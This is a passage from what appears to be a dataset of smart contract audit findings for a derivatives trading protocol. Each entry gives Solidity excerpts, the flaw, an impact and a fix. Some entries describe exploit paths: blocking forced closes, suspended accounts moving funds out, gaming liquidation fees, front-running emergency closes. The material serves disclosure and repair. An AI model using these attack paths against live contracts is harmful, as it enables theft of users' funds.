quoteLayout.partyBPendingQuotes[msg.sender][quote.partyA].push(quote.id);\\n }\\n```\\n" +Wrong calculation of solvency after request to close and after close position,medium,"`isSolventAfterClosePosition` and `isSolventAfterRequestToClosePosition` do not account for the extra profit that the user would get from closing 
the position.\\nWhen a party A creates a request for closing a position, the `isSolventAfterRequestToClosePosition` function is called to check if the user is solvent after the request. In the same way, when someone tries to close a position, the `isSolventAfterClosePosition` function is called to check if both party A and party B are solvent after closing the position.\\nBoth functions calculate the available balance for party A and party B, and revert if it is lower than zero. After that, the function accounts for the the extra loss that the user would get as a result of the difference between `closePrice` and `upnlSig.price`, and checks if the user is solvent after that.\\nThe problem is that the function does not account for the opposite case, that is the case where the user would get an extra profit as a result of the difference between `closePrice` and `upnlSig.price`. This means that the user would not be able to close the position, even if at the end of the transaction they would be solvent.\\nProof of Concept\\nThere is an open position with:\\nPosition type: LONG\\nQuantity: 1\\nLocked: 50\\nOpened price: 100\\nCurrent price: 110\\nQuote position uPnL Party A: 10\\nParty B calls `fillCloseRequest` with:\\nClosed price: 120\\nIn `isSolventAfterClosePosition` the following is calculated:\\n```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n\\nAnd it reverts on:\\n```\\nrequire(\\n partyBAvailableBalance >= 0 && partyAAvailableBalance >= 0,\\n ""LibSolvency: Available balance is lower than zero""\\n);\\n```\\n\\nHowever, the extra profit for `closedPrice - upnlSig.price = 120 - 110 = 10` is not accounted for in the `partyAAvailableBalance` calculation, that should be `partyAAvailableBalance = - 5 + 10 = 5`. 
Party A would be solvent after closing the position, but the transaction reverts.",Add the extra profit to the `partyAAvailableBalance` calculation.,"In a situation where the difference between the closed price and the current price will make the user solvent, users will not be able to close their positions, even if at the end of the transaction they would be solvent.",```\\npartyAAvailableBalance = freeBalance + upnl + unlockedAmount = -5\\n```\\n +Malicious PartyB can block unfavorable close position requests causing a loss of profits for PartyB,medium,"Malicious PartyB can block close position requests that are unfavorable toward them by intentionally choose not to fulfill the close request and continuously prolonging the force close position cooldown period, causing a loss of profits for PartyA.\\nIf PartyA invokes the `requestToClosePosition` function for an open quote, the quote's status will transition from `QuoteStatus.OPEN` to `QuoteStatus.CLOSE_PENDING`. In case PartyB fails to fulfill the close request (fillCloseRequest) during the cooldown period (maLayout.forceCloseCooldown), PartyA has the option to forcibly close the quote by utilizing the `forceClosePosition` function.\\n```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyAFacet: Invalid state"");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n ""PartyAFacet: Cooldown not reached""\\n );\\n..SNIP..\\n```\\n\\nNevertheless, malicious PartyB can intentionally choose not to fulfill the close request and can continuously prolong the `quote.modifyTimestamp`, thereby preventing 
PartyA from ever being able to activate the `forceClosePosition` function.\\nMalicious PartyB could extend the `quote.modifyTimestamp` via the following steps:\\nLine 282 of the `fillCloseRequest` show that it is possible to partially fill a close request. As such, calls the `fillCloseRequest` function with the minimum possible `filledAmount` for the purpose of triggering the `LibQuote.closeQuote` function at Line 292.\\n```\\nFile: PartyBFacetImpl.sol\\n function fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal {\\n..SNIP..\\n if (quote.orderType == OrderType.LIMIT) {\\n require(quote.quantityToClose >= filledAmount, ""PartyBFacet: Invalid filledAmount"");\\n } else {\\n require(quote.quantityToClose == filledAmount, ""PartyBFacet: Invalid filledAmount"");\\n }\\n..SNIP..\\n LibQuote.closeQuote(quote, filledAmount, closedPrice);\\n }\\n```\\n\\nOnce the `LibQuote.closeQuote` function is triggered, Line 153 will update the `quote.modifyTimestamp` to the current timestamp, which effectively extends the cooldown period that PartyA has to wait before allowing to forcefully close the position.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n..SNIP..\\n```\\n","The `quote.modifyTimestamp` is updated to the current timestamp in many functions, including the `closeQuote` function, as shown in the above example. A quick search within the codebase shows that there are around 17 functions that update the `quote.modifyTimestamp` to the current timestamp when triggered. 
Each of these functions serves as a potential attack vector for malicious PartyB to extend the `quote.modifyTimestamp` and deny users from forcefully closing their positions\\nIt is recommended not to use the `quote.modifyTimestamp` for the purpose of determining if the force close position cooldown has reached, as this variable has been used in many other places. Instead, consider creating a new variable, such as `quote.requestClosePositionTimestamp` solely for the purpose of computing the force cancel quote cooldown.\\nThe following fixes will prevent malicious PartyB from extending the cooldown period since the `quote.requestClosePositionTimestamp` variable is only used solely for the purpose of determining if the force close position cooldown has reached.\\n```\\nfunction requestToClosePosition(\\n uint256 quoteId,\\n uint256 closePrice,\\n uint256 quantityToClose,\\n OrderType orderType,\\n uint256 deadline,\\n SingleUpnlAndPriceSig memory upnlSig\\n) internal {\\n..SNIP..\\n accountLayout.partyANonces[quote.partyA] // Add the line below\\n= 1;\\n quote.modifyTimestamp = block.timestamp;\\n// Add the line below\\n quote.requestCancelQuoteTimestamp = block.timestamp;\\n```\\n\\n```\\nfunction forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyAFacet: Invalid state"");\\n require(\\n// Remove the line below\\n block.timestamp > quote.modifyTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n// Add the line below\\n block.timestamp > quote.requestCancelQuoteTimestamp // Add the line below\\n maLayout.forceCloseCooldown,\\n ""PartyAFacet: Cooldown not reached""\\n );\\n```\\n\\nIn addition, review the 
`forceClosePosition` function and applied the same fix to it since it is vulnerable to the same issue, but with a different impact.","PartyB has the ability to deny users from forcefully closing their positions by exploiting the issue. Malicious PartyB could abuse this by blocking PartyA from closing their positions against them when the price is unfavorable toward them. For instance, when PartyA is winning the game and decided to close some of its positions against PartyB, PartyB could block the close position request to deny PartyA of their profits and prevent themselves from losing the game.","```\\nFile: PartyAFacetImpl.sol\\n function forceClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n MAStorage.Layout storage maLayout = MAStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n\\n uint256 filledAmount = quote.quantityToClose;\\n require(quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyAFacet: Invalid state"");\\n require(\\n block.timestamp > quote.modifyTimestamp + maLayout.forceCloseCooldown,\\n ""PartyAFacet: Cooldown not reached""\\n );\\n..SNIP..\\n```\\n" +Users might immediately be liquidated after position opening leading to a loss of CVA and Liquidation fee,medium,"The insolvency check (isSolventAfterOpenPosition) within the `openPosition` function does not consider the locked balance adjustment, causing the user account to become insolvent immediately after the position is opened. 
As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.\\n```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n\\nThe leverage of a position is computed based on the following formula.\\n$leverage = \\frac{price \\times quantity}{lockedValues.total()}$\\nWhen opening a position, there is a possibility that the leverage might change because the locked values and quantity are fixed, but it could get filled with a different market price compared to the one at the moment the user requested. Thus, the purpose of Line 163 above is to adjust the locked values to maintain a fixed leverage. After the adjustment, the locked value might be higher or lower.\\nThe issue is that the insolvency check at Line 150 is performed before the adjustment is made.\\nAssume that the adjustment in Line 163 cause the locked values to increase. The insolvency check (isSolventAfterOpenPosition) at Line 150 will be performed with old or unadjusted locked values that are smaller than expected. 
Since smaller locked values mean that there will be more available balance, this might cause the system to miscalculate that an account is not liquidatable, but in fact, it is actually liquidatable once the adjusted increased locked value is taken into consideration.\\nIn this case, once the position is opened, the user account is immediately underwater and can be liquidated.\\nThe issue will occur in the ""complete fill"" path and ""partial fill"" path since both paths adjust the locked values to maintain a fixed leverage. The ""complete fill"" path adjusts the locked values at Line 185",Consider performing the insolvency check with the updated adjusted locked values.,"Users might become liquidatable immediately after opening a position due to an incorrect insolvency check within the `openPosition`, which erroneously reports that the account will still be healthy after opening the position, while in reality, it is not. As a result, the affected users will lose their CVA and liquidation fee locked in their accounts.","```\\nFile: PartyBFacetImpl.sol\\n function openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n ) internal returns (uint256 currentId) {\\n..SNIP..\\n LibSolvency.isSolventAfterOpenPosition(quoteId, filledAmount, upnlSig);\\n\\n accountLayout.partyANonces[quote.partyA] += 1;\\n accountLayout.partyBNonces[quote.partyB][quote.partyA] += 1;\\n quote.modifyTimestamp = block.timestamp;\\n\\n LibQuote.removeFromPendingQuotes(quote);\\n\\n if (quote.quantity == filledAmount) {\\n accountLayout.pendingLockedBalances[quote.partyA].subQuote(quote);\\n accountLayout.partyBPendingLockedBalances[quote.partyB][quote.partyA].subQuote(quote);\\n\\n if (quote.orderType == OrderType.LIMIT) {\\n quote.lockedValues.mul(openedPrice).div(quote.requestedOpenPrice);\\n }\\n accountLayout.lockedBalances[quote.partyA].addQuote(quote);\\n 
accountLayout.partyBLockedBalances[quote.partyB][quote.partyA].addQuote(quote);\\n }\\n```\\n" +Suspended PartyBs can bypass the withdrawal restriction by exploiting `fillCloseRequest`,medium,"Suspended PartyBs can bypass the withdrawal restriction by exploiting the `fillCloseRequest` function. Thus, an attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.\\n```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n\\nWhen a user is suspended, they are not allowed to call any of the `withdraw` functions (withdraw and withdrawTo) to `withdraw` funds from their account. These withdrawal functions are guarded by the `notSuspended` modifier that will revert if the user's address is suspended.\\n```\\nFile: Accessibility.sol\\n modifier notSuspended(address user) {\\n require(\\n !AccountStorage.layout().suspendedAddresses[user],\\n ""Accessibility: Sender is Suspended""\\n );\\n _;\\n }\\n```\\n\\nHowever, suspended PartyBs can bypass this restriction by exploiting the `fillCloseRequest` function to transfer the assets out of the protocol. The following describes the proof-of-concept:\\nAnyone can be a PartyA within the protocol. Suspended PartyBs use one of their wallet addresses to operate as a PartyA.\\nUse the PartyA to create a new position with an unfavorable price that will immediately result in a significant loss for any PartyB who takes on the position. 
The `partyBsWhiteList` of the new position is set to PartyB address only to prevent some other PartyB from taking on this position.\\nOnce PartyB takes on the position, PartyB will immediately incur a significant loss, while PartyA will enjoy a significant gain due to the zero-sum nature of this game.\\nPartyA requested to close its position to lock the profits and PartyB will fill the close request.\\nPartyA calls the deallocate and withdraw functions to move the assets/gains out of the protocol.","Add the `notSuspended` modifier to the `openPosition` and `fillCloseRequest` functions to block the above-described attack path.\\n```\\nfunction fillCloseRequest(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 closedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\n\\n```\\nfunction openPosition(\\n uint256 quoteId,\\n uint256 filledAmount,\\n uint256 openedPrice,\\n PairUpnlAndPriceSig memory upnlSig\\n// Remove the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) {\\n// Add the line below\\n ) external whenNotPartyBActionsPaused onlyPartyBOfQuote(quoteId) notLiquidated(quoteId) notSuspended(msg.sender) {\\n ..SNIP..\\n}\\n```\\n","In the event of an attack, the protocol will suspend the malicious account and prevent it from transferring ill-gotten gains out of the protocol. 
However, since this restriction can be bypassed, the attacker can transfer the ill-gotten gains out of the protocol, leading to a loss of assets for the protocol and its users.","```\\nFile: AccountFacet.sol\\n function withdraw(uint256 amount) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(msg.sender, amount);\\n emit Withdraw(msg.sender, msg.sender, amount);\\n }\\n\\n function withdrawTo(\\n address user,\\n uint256 amount\\n ) external whenNotAccountingPaused notSuspended(msg.sender) {\\n AccountFacetImpl.withdraw(user, amount);\\n emit Withdraw(msg.sender, user, amount);\\n }\\n```\\n" +Imbalanced approach of distributing the liquidation fee within `setSymbolsPrice` function,medium,"The imbalance approach of distributing the liquidation fee within `setSymbolsPrice` function could be exploited by malicious liquidators to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, it causes harm or losses to other parties within the protocols.\\nA PartyA can own a large number of different symbols in its portfolio. To avoid out-of-gas (OOG) errors from occurring during liquidation, the `setSymbolsPrice` function allows the liquidators to inject the price of the symbols in multiple transactions instead of all in one go.\\nAssume that the injection of the price symbols requires 5 transactions/rounds to complete and populate the price of all the symbols in a PartyA's portfolio. Based on the current implementation, only the first liquidator that calls the `setSymbolsPrice` will receive the liquidation fee. 
Liquidators that call the `setSymbolsPrice` function subsequently will not be added to the `AccountStorage.layout().liquidators[partyA]` listing as Line 88 will only be executed once when the `liquidationType` is still not initialized yet.\\n```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n ""LiquidationFacet: Invalid upnl sig""\\n );\\n }\\n }\\n```\\n\\nA malicious liquidator could take advantage of this by only setting the symbol prices for the first round for each liquidation happening in the protocol. To maximize their profits, the malicious liquidator would call the `setSymbolsPrice` with none or only one (1) symbol price to save on the gas cost. The malicious liquidator would then leave it to the others to complete the rest of the liquidation process, and they will receive half of the liquidation fee at the end of the liquidation process.\\nSomeone would eventually need to step in to complete the liquidation process. Even if none of the liquidators is incentivized to complete the process of setting the symbol prices since they will not receive any liquidation fee, the counterparty would eventually have no choice but to step in to perform the liquidation themselves. Otherwise, the profits of the counterparty cannot be realized. 
At the end of the day, the liquidation will be completed, and the malicious liquidator will still receive the liquidation fee.","Consider a more balanced approach for distributing the liquidation fee for liquidators that calls the `setSymbolsPrice` function. For instance, the liquidators should be compensated based on the number of symbol prices they have injected.\\nIf there are 10 symbols to be filled up, if Bob filled up 4 out of 10 symbols, he should only receive 40% of the liquidation fee. This approach has already been implemented within the `liquidatePartyB` function via the `partyBPositionLiquidatorsShare` variable. Thus, the same design could be retrofitted into the `setSymbolsPrice` function.","Malicious liquidators could exploit the liquidation process to obtain the liquidation fee without completing their tasks and maximizing their gains. While doing so, many liquidations would be stuck halfway since it is likely that no other liquidators will step in to complete the setting of the symbol prices because they will not receive any liquidation fee for doing so (not incentivized).\\nThis could potentially lead to the loss of assets for various parties:\\nThe counterparty would eventually have no choice but to step in to perform the liquidation themselves. 
The counterparty has to pay for its own liquidation, even though it has already paid half the liquidation fee to the liquidator.\\nMany liquidations would be stuck halfway, and liquidation might be delayed, which exposes users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.","```\\nFile: LiquidationFacetImpl.sol\\n function setSymbolsPrice(address partyA, PriceSig memory priceSig) internal {\\n..SNIP..\\n if (accountLayout.liquidationDetails[partyA].liquidationType == LiquidationType.NONE) {\\n accountLayout.liquidationDetails[partyA] = LiquidationDetail({\\n liquidationType: LiquidationType.NONE,\\n upnl: priceSig.upnl,\\n totalUnrealizedLoss: priceSig.totalUnrealizedLoss,\\n deficit: 0,\\n liquidationFee: 0\\n });\\n..SNIP..\\n AccountStorage.layout().liquidators[partyA].push(msg.sender);\\n } else {\\n require(\\n accountLayout.liquidationDetails[partyA].upnl == priceSig.upnl &&\\n accountLayout.liquidationDetails[partyA].totalUnrealizedLoss ==\\n priceSig.totalUnrealizedLoss,\\n ""LiquidationFacet: Invalid upnl sig""\\n );\\n }\\n }\\n```\\n" +Liquidators will not be incentivized to liquidate certain PartyB accounts due to the lack of incentives,medium,"Liquidating certain accounts does not provide a liquidation fee to the liquidators. 
Liquidators will not be incentivized to liquidate such accounts, which may lead to liquidation being delayed or not performed, exposing Party B to unnecessary risks and potentially resulting in greater asset losses than anticipated.\\n```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n\\nAssume that the loss of Party B is more than the liquidation fee. In this case, the else branch of the above code within the `liquidatePartyB` function will be executed. The `liquidatorShare` and `partyBPositionLiquidatorsShare` variables will both be zero, which means the liquidators will get nothing in return for liquidating PartyBs.\\nAs a result, there will not be any incentive for the liquidators to liquidate such positions.",Consider updating the liquidation incentive mechanism so that it will always provide some incentive for the liquidators to take the initiative to liquidate insolvent accounts. This will help to build a more robust and efficient liquidation mechanism for the protocols. One possible approach is to always give a percentage of the CVA of the liquidated account as a liquidation fee to the liquidators.,"Liquidators will not be incentivized to liquidate those accounts that do not provide them with a liquidation fee. As a result, the liquidation of those accounts might be delayed or not performed at all. 
When liquidation is not performed in a timely manner, PartyB ended up taking on additional unnecessary risks that could be avoided in the first place if a different liquidation incentive mechanism is adopted, potentially leading to PartyB losing more assets than expected.\\nAlthough PartyBs are incentivized to perform liquidation themselves since it is the PartyBs that take on the most risks from the late liquidation, the roles of PartyB and liquidator are clearly segregated in the protocol design. Only addresses granted the role of liquidators can perform liquidation as the liquidation functions are guarded by `onlyRole(LibAccessibility.LIQUIDATOR_ROLE)`. Unless the contracts are implemented in a manner that automatically grants a liquidator role to all new PartyB upon registration OR liquidation functions are made permissionless, PartyBs are likely not able to perform the liquidation themselves when the need arises.\\nMoreover, the PartyBs are not expected to be both a hedger and liquidator simultaneously as they might not have the skillset or resources to maintain an infrastructure for monitoring their accounts/positions for potential late liquidation.",```\\nFile: LiquidationFacetImpl.sol\\n function liquidatePartyB(\\n..SNIP..\\n if (uint256(-availableBalance) < accountLayout.partyBLockedBalances[partyB][partyA].lf) {\\n remainingLf =\\n accountLayout.partyBLockedBalances[partyB][partyA].lf -\\n uint256(-availableBalance);\\n liquidatorShare = (remainingLf * maLayout.liquidatorShare) / 1e18;\\n\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] =\\n (remainingLf - liquidatorShare) /\\n quoteLayout.partyBPositionsCount[partyB][partyA];\\n } else {\\n maLayout.partyBPositionLiquidatorsShare[partyB][partyA] = 0;\\n }\\n```\\n +`emergencyClosePosition` can be blocked,medium,"The `emergencyClosePosition` function can be blocked as PartyA can change the position's status, which causes the transaction to revert when executed.\\nActivating the emergency mode 
can be done either for a specific PartyB or for the entire system. Once activated, PartyB gains the ability to swiftly close positions without requiring users' requests. This functionality is specifically designed to cater to urgent situations where PartyBs must promptly close their positions.\\nBased on the `PartyBFacetImpl.emergencyClosePosition` function, a position can only be ""emergency"" close if its status is `QuoteStatus.OPENED`.\\n```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, ""PartyBFacet: Invalid state"");\\n..SNIP..\\n```\\n\\nAs a result, if PartyA knows that emergency mode has been activated, PartyA could pre-emptively call the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) against their positions to change the state to `QuoteStatus.CLOSE_PENDING` so that the `PartyBFacetImpl.emergencyClosePosition` function will always revert when triggered by PartyB. This effectively blocks PartyB from ""emergency"" close the positions in urgent situations.\\nPartyA could also block PartyB ""emergency"" close on-demand by front-running PartyB's `PartyBFacetImpl.emergencyClosePosition` transaction with the `PartyAFacetImpl.requestToClosePosition` with minimum possible `quantityToClose` (e.g. 1 wei) when detected.\\nPartyB could accept the close position request of 1 wei to revert the quote's status back to `QuoteStatus.OPENED` and try to perform an ""emergency"" close again. 
However, a sophisticated malicious user could front-run PartyA to revert the quote's status back to `QuoteStatus.CLOSE_PENDING` again to block the ""emergency"" close for a second time.","Update the `emergencyClosePosition` so that the ""emergency"" close can still proceed even if the position's status is `QuoteStatus.CLOSE_PENDING`.\\n```\\nfunction emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n// Remove the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED, ""PartyBFacet: Invalid state"");\\n// Add the line below\\n require(quote.quoteStatus == QuoteStatus.OPENED || quote.quoteStatus == QuoteStatus.CLOSE_PENDING, ""PartyBFacet: Invalid state"");\\n..SNIP..\\n```\\n","During urgent situations where emergency mode is activated, the positions need to be promptly closed to avoid negative events that could potentially lead to serious loss of funds (e.g. the protocol is compromised, and the attacker is planning to or has started draining funds from the protocols). However, if the emergency closure of positions is blocked or delayed, it might lead to unrecoverable losses.","```\\nFile: PartyBFacetImpl.sol\\n function emergencyClosePosition(uint256 quoteId, PairUpnlAndPriceSig memory upnlSig) internal {\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n Quote storage quote = QuoteStorage.layout().quotes[quoteId];\\n require(quote.quoteStatus == QuoteStatus.OPENED, ""PartyBFacet: Invalid state"");\\n..SNIP..\\n```\\n" +Position value can fall below the minimum acceptable quote value,medium,"PartyB can fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue). 
As a result, it breaks the invariant that the value of position must be above the minimum acceptable quote value, leading to various issues and potentially losses for the users.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low""\\n );\\n }\\n }\\n```\\n\\nIf the user has already sent the close request, but partyB has not filled it yet, the user can request to cancel it by calling the `CancelCloseRequest` function. This will cause the quote's status to change to `QuoteStatus.CANCEL_CLOSE_PENDING`.\\nPartyB can either accept the cancel request or fill the close request ignoring the user's request. If PartyB decided to go ahead to fill the close request partially, the second branch of the if-else statement at Line 196 will be executed. However, the issue is that within this branch, PartyB is not subjected to the `minAcceptableQuoteValue` validation check. 
Thus, it is possible for PartyB to fill a LIMIT order position till the point where the value is below the minimum acceptable quote value (minAcceptableQuoteValue).","If the user sends a close request and PartyB decides to go ahead to fill the close request partially, consider checking if the remaining value of the position is above the minimum acceptable quote value (minAcceptableQuoteValue) after PartyB has filled the position.\\n```\\nfunction closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n ..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n// Add the line below\\n \\n// Add the line below\\n require(\\n// Add the line below\\n quote.lockedValues.total() >=\\n// Add the line below\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n// Add the line below\\n ""LibQuote: Remaining quote value is low""\\n// Add the line below\\n );\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low""\\n );\\n }\\n}\\n```\\n","In the codebase, the `minAcceptableQuoteValue` is currently set to 5 USD. There are many reasons for having a minimum quote value in the first place. For instance, if the value of a position is too low, it will be uneconomical for the liquidator to liquidate the position because the liquidation fee would be too small or insufficient to cover the cost of liquidation. 
Note that the liquidation fee is computed as a percentage of the position value.\\nThis has a negative impact on the overall efficiency of the liquidation mechanism within the protocol, which could delay or stop the liquidation of accounts or positions, exposing users to greater market risks, including the risk of incurring larger losses or having to exit at an unfavorable price.","```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n..SNIP..\\n if (quote.closedAmount == quote.quantity) {\\n quote.quoteStatus = QuoteStatus.CLOSED;\\n quote.requestedClosePrice = 0;\\n removeFromOpenPositions(quote.id);\\n quoteLayout.partyAPositionsCount[quote.partyA] -= 1;\\n quoteLayout.partyBPositionsCount[quote.partyB][quote.partyA] -= 1;\\n } else if (\\n quote.quoteStatus == QuoteStatus.CANCEL_CLOSE_PENDING || quote.quantityToClose == 0\\n ) {\\n quote.quoteStatus = QuoteStatus.OPENED;\\n quote.requestedClosePrice = 0;\\n quote.quantityToClose = 0; // for CANCEL_CLOSE_PENDING status\\n } else {\\n require(\\n quote.lockedValues.total() >=\\n SymbolStorage.layout().symbols[quote.symbolId].minAcceptableQuoteValue,\\n ""LibQuote: Remaining quote value is low""\\n );\\n }\\n }\\n```\\n" +Rounding error when closing quote,medium,"Rounding errors could occur if the provided `filledAmount` is too small, resulting in the locked balance of an account remains the same even though a certain amount of the position has been closed.\\n```\\nFile: LibQuote.sol\\n function closeQuote(Quote storage quote, uint256 filledAmount, uint256 closedPrice) internal {\\n QuoteStorage.Layout storage quoteLayout = QuoteStorage.layout();\\n AccountStorage.Layout storage accountLayout = AccountStorage.layout();\\n\\n quote.modifyTimestamp = block.timestamp;\\n\\n LockedValues memory lockedValues = LockedValues(\\n quote.lockedValues.cva -\\n ((quote.lockedValues.cva * filledAmount) / (LibQuote.quoteOpenAmount(quote))),\\n 
